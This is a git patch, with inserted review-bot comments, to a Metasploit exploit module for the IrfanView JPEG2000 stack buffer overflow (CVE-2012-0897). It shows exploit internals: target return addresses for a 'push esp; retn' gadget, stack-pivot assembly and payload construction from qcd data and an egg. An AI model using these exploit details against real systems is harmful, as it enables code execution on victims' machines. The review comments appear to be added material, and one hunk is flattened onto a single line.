From 5dbfb7b9aa6b675d53fc996bad6400c2ff5e664c Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Sat, 30 Jun 2012 14:18:25 +0200
Subject: [PATCH] last cleanup
---
 .../windows/fileformat/irfanview_jpeg2000_bof.rb | 15 ++++++---------
 1 file changed, 6 insertions(+), 9 deletions(-)
diff --git a/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb b/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb
index fe7eddd6f9..a456210df2 100644
--- a/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb
+++ b/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb
@@ -22,9 +22,10 @@ class Metasploit3 < Msf::Exploit::Remote
 'Name' => 'Irfanview JPEG2000 <= v4.3.2.0 jp2 Stack Buffer Overflow',
 'Description' => %q{
 This module exploits a stack-based buffer overflow vulnerability in
- version <= 4.3.2.0 of Irfanview's JPEG2000.dll plugin. The vulnerability is
- triggered via parsing an invalid qcd chunk structure and specfiying a
- malformed qcd size and data.
+ version <= 4.3.2.0 of Irfanview's JPEG2000.dll plugin. This exploit has been
+ tested on a specific version of irfanview (v4.3.2), although other versions may
+ work also. The vulnerability is triggered via parsing an invalid qcd chunk
+ structure and specifying a malformed qcd size and data.
 Payload delivery and vulnerability trigger can be executed in multiple ways.
 The user can double click the file, use the file dialog, open via the icon
@@ -43,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote
 [ 'CVE', '2012-0897' ],
 [ 'OSVDB', '78333'],
 [ 'BID', '51426' ],
- [ 'URL', 'http://www.greyhathacker.net/?p=525' ]
+ [ 'URL', 'http://www.greyhathacker.net/?p=525' ],
 ],
 'Platform' => [ 'win' ],
 'DefaultOptions' =>
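Review bot: The sentence added to 'Description' in the first hunk gives the tested release as `irfanview (v4.3.2)`, while 'Name' and the line above it use `4.3.2.0` for the JPEG2000.dll plugin and the target list later in the file labels the application `Irfanview 4.32`. Someone checking whether an installed build is covered cannot tell whether `v4.3.2` refers to the application or to the plugin. I would reuse the wording of the target label, e.g. `tested on Irfanview 4.32 with plugins 4.32, although other versions may work also`. The Description string continues past the end of the hunk.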
@@ -59,10 +60,9 @@ class Metasploit3 < Msf::Exploit::Remote 'Targets' => [ # push esp; retn [i_view32.exe] - [ 'Irfanview 4.33 / Plugins 4.32 / Windows Universal', { 'Ret' => 0x0049a6b4 } ], [ 'Irfanview 4.32 / Plugins 4.32 / Windows Universal', { 'Ret' => 0x004819d8 } ] ], - 'DisclosureDate' => 'Jun 24 2011', + 'DisclosureDate' => 'Jan 16 2012', 'DefaultTarget' => 0)) register_options( @@ -179,9 +179,6 @@ class Metasploit3 < Msf::Exploit::Remote pivot = Metasm::Shellcode.assemble(Metasm::Ia32.new, pivot).encode_string - # pass 'cmp dword ptr [eax+ebx*4],ebp' - pivot << "\xff\x66" # we use this to reach the end of our function - qcd_data << encode_bytes(pivot) qcd_data << egg
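Review bot: The removal of the `Irfanview 4.33 / Plugins 4.32` entry from 'Targets' and the change of 'DisclosureDate' from `Jun 24 2011` to `Jan 16 2012` are not explained anywhere, and the subject line `last cleanup` does not explain them either. The one remaining entry is still labelled `Windows Universal`, so the metadata no longer records that 4.33 was ever looked at; a reader using the module to judge which builds are covered could take 4.33 as unaffected when it may only be untested or have been dropped as unreliable (presumably the reason, which is not visible here). A one-line comment above the target list would keep that on record, e.g. `# 4.33 target removed: <reason>; disclosure date taken from <advisory reference>`. The info hash starts and ends outside the hunk.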